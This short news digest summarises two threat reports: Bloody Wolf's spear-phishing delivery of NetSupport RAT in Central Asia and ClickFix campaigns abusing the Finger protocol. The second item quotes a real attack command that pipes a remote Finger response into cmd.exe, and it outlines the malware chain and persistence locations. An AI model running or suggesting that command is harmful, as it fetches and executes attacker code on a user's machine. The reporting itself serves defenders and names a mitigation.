All news with #netsupport manager tag

Bloody Wolf Expands Java-Based NetSupport Campaign Regionally

🐺 Group-IB and Ukuk report that the actor known as Bloody Wolf has conducted spear-phishing campaigns since June 2025 targeting Kyrgyzstan and, by October 2025, expanded into Uzbekistan to deliver NetSupport RAT. Attackers impersonate government ministries using malicious PDFs that host Java Archive (JAR) loaders built for Java 8, instructing victims to install Java so the loader can execute. The loader fetches the NetSupport payload and establishes persistence via scheduled tasks, registry entries, and a startup batch script in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.